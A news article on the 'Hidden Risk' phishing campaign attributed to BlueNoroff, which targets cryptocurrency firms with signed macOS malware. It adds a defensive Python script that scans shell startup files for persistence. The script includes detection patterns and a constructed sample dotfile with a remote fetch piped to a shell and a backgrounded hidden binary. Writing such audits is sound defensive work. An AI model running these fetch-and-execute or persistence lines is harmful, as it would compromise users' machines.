North Korean Hackers Launch 'Hidden Risk' Campaign, Targeting Cryptocurrency Firms with Sophisticated Malware

North Korean state-sponsored hackers have expanded their tactics with a new initiative called ‘Hidden Risk.’ This campaign aims to infiltrate cryptocurrency firms using malware disguised as legitimate documents.

According to a report from SentinelLabs, this effort is attributed to the BlueNoroff group, a subunit of the Lazarus Group, which is known for stealing millions to fund North Korea's nuclear and weapons programs.

These attacks are a strategic move to extract funds from the rapidly growing $2.6 trillion cryptocurrency market. They are taking advantage of its decentralized and often under-regulated nature.

The FBI recently issued warnings about North Korean cyber actors targeting employees of decentralized finance (DeFi) and exchange-traded fund (ETF) firms. They are using tailored social engineering techniques to do this.

The latest campaign appears to be an extension of these efforts. It focuses on breaching cryptocurrency exchanges and financial platforms.

Instead of grooming victims through social media, the hackers are now relying on phishing emails that look like cryptocurrency news alerts. These emails started appearing in July.

They disguise themselves as updates on Bitcoin (BTC) prices or the latest trends in DeFi. The goal is to lure victims into clicking on links that seem to lead to legitimate PDF documents.

But here’s the catch: instead of a harmless file, unsuspecting users end up downloading a malicious application onto their Macs.

This new malware is particularly concerning because it bypasses Apple's built-in security protections: the hackers get their software signed with legitimate Apple Developer IDs, so it passes macOS's Gatekeeper checks instead of being blocked as unidentified software.

Once installed, the malware uses hidden system files to stay undetected, even after a computer restart. It communicates with remote servers controlled by the hackers.
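The article says only that the malware persists through "hidden system files" that survive a restart. On macOS, the usual candidates for that are the dotfiles the login shell reads automatically (`~/.zshenv`, `~/.zshrc`, `~/.bash_profile` and similar), so a defender's first check is to audit those files for lines that fetch and run remote code, decode payloads, or launch executables from hidden or temporary directories. The script below is an added example written for this page, not code from SentinelLabs or the report; the rule set, the benign-directory allowlist and the sample dotfiles it builds are all constructed assumptions, and the generalization from "hidden files" to shell startup files is ours.

```python
"""Audit hidden shell startup files for persistence-style content (added example)."""
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Files the shell reads on login or on every new session, so anything in them re-runs after a reboot.
STARTUP_FILES = (".zshenv", ".zprofile", ".zshrc", ".zlogin",
                 ".bash_profile", ".bashrc", ".profile")

# Constructed heuristics: each rule is a regex applied to one non-comment line.
RULES = {
    "remote_fetch_piped_to_shell": re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"),
    "base64_decode": re.compile(r"\bbase64\b.*\s(-d|-D|--decode)\b"),
    "exec_from_tmp": re.compile(r"(^|[\s;&|(])/(tmp|private/tmp|var/tmp)/\S+"),
    "backgrounded_nohup": re.compile(r"\bnohup\b.*&\s*$"),
}

# Paths under a hidden directory in the home folder (e.g. ~/.config/.updater).
HIDDEN_DIR_RE = re.compile(r"(?:\$HOME|~|/Users/[^/\s]+)?/\.([^/\s]+)/\S+")
# Hidden directories that legitimately appear in startup files (assumed allowlist; tune per fleet).
BENIGN_HIDDEN_DIRS = {"nvm", "cargo", "oh-my-zsh", "rbenv", "pyenv", "sdkman", "local"}


def scan_line(line: str) -> List[str]:
    """Return the names of every rule that fires on this line (empty for comments/blank lines)."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return []
    hits = [name for name, rx in RULES.items() if rx.search(stripped)]
    for match in HIDDEN_DIR_RE.finditer(stripped):
        if match.group(1) not in BENIGN_HIDDEN_DIRS:
            hits.append("path_under_hidden_dir")
            break
    return hits


def audit_home(home: Path) -> List[Dict]:
    """Scan each startup file that exists under `home`; one finding per flagged line."""
    findings: List[Dict] = []
    for name in STARTUP_FILES:
        path = home / name
        if not path.is_file():
            continue
        for number, line in enumerate(path.read_text(errors="replace").splitlines(), start=1):
            rules = scan_line(line)
            if rules:
                findings.append({"file": name, "line": number, "rules": rules, "text": line.strip()})
    return findings


def build_sample_home(root: Path) -> Path:
    """Write constructed sample dotfiles (plain text, never executed) into `root` and return it."""
    (root / ".zshrc").write_text(
        'export PATH="$HOME/bin:$PATH"\n'
        "source ~/.nvm/nvm.sh\n"          # benign: allowlisted hidden directory
        "alias ll='ls -la'\n"
    )
    (root / ".zshenv").write_text(
        "# constructed sample of a persistence stub; this script only reads it\n"
        "curl -s http://example.invalid/update | sh\n"
        'nohup "$HOME/.config/.updater" >/dev/null 2>&1 &\n'
    )
    return root


def demo() -> List[Dict]:
    """Run the audit against the constructed sample home and return its findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_home(build_sample_home(Path(tmp)))


if __name__ == "__main__":
    for finding in demo():
        print(f"{finding['file']}:{finding['line']} {finding['rules']}  {finding['text']}")
    # To audit the current user's real startup files instead: audit_home(Path.home())
```

The hidden-directory rule is deliberately allowlisted rather than blanket, because version managers and plugin frameworks legitimately source files from dotdirectories; the point is to surface the unusual entries (a remote fetch piped to a shell, a backgrounded binary under a hidden folder) for a human to review, not to auto-remediate.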

SentinelLabs advises macOS users, especially those in organizations, to tighten their security measures. It's crucial to stay aware of potential risks.